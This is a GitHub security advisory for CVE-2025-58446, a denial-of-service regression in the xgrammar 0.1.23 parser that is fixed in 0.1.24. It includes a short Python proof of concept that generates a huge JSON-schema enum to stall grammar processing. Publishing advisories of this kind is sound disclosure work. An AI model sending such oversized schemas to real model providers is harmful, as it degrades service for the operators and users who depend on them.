ghsa-9q5r-wfvf-rr7f
Vulnerability from github
Published
2025-09-05 21:10
Modified
2025-09-10 20:51
Summary
xgrammar vulnerable to denial of service by huge enum grammar
Details

Summary

Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.

Details

Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.

Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars.

Thanks to @Seven-Streams

PoC

``` import string import random

def enum_schema(size=10000,str_len=10): enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]} schema = { "definitions": { "colorEnum": enum }, "type": "object", "properties": { "color1": { "$ref": "#/definitions/colorEnum" }, "color2": { "$ref": "#/definitions/colorEnum" }, "color3": { "$ref": "#/definitions/colorEnum" }, "color4": { "$ref": "#/definitions/colorEnum" }, "color5": { "$ref": "#/definitions/colorEnum" }, "color6": { "$ref": "#/definitions/colorEnum" }, "color7": { "$ref": "#/definitions/colorEnum" }, "color8": { "$ref": "#/definitions/colorEnum" } }, "required": [ "color1", "color2" ] } return schema

schema_enum = enum_schema() print(schema_enum) print(test_schema(schema_enum, {})) ```

where: def test_schema(schema, instance): grammar = xgr.Grammar.from_json_schema( json.dumps(schema), strict_mode=True ) return _is_grammar_accept_string(grammar, json.dumps(instance))

Impact

DOS

Show details on source website


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "xgrammar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1.23"
            },
            {
              "fixed": "0.1.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1.23"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-58446"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-05T21:10:06Z",
    "nvd_published_at": "2025-09-06T19:15:38Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nProvided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.\n\n### Details\n\nFull reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.\n\n### Patch\n\nThis problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (\u003e100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. \n\nThanks to @Seven-Streams \n\n### PoC\n```\nimport string\nimport random\n\ndef enum_schema(size=10000,str_len=10):\n    enum =  {\"enum\": [\"\".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}\n    schema = {\n        \"definitions\": {\n            \"colorEnum\": enum\n        },\n        \"type\": \"object\",\n        \"properties\": {\n            \"color1\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color2\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color3\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color4\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color5\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color6\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color7\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            },\n            \"color8\": {\n                \"$ref\": \"#/definitions/colorEnum\"\n            }\n        },\n        \"required\": [\n                \"color1\",\n                \"color2\"\n         ]\n    }\n    return schema\n\nschema_enum = enum_schema()\nprint(schema_enum)\nprint(test_schema(schema_enum, {}))\n```\n\nwhere:\n```\ndef test_schema(schema, instance):\n    grammar = xgr.Grammar.from_json_schema(\n        json.dumps(schema),\n        strict_mode=True\n    )\n    return _is_grammar_accept_string(grammar, json.dumps(instance))\n```\n\n### Impact\nDOS",
  "id": "GHSA-9q5r-wfvf-rr7f",
  "modified": "2025-09-10T20:51:27Z",
  "published": "2025-09-05T21:10:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58446"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mlc-ai/xgrammar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "xgrammar vulnerable to denial of service by huge enum grammar"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.


Loading…

Loading…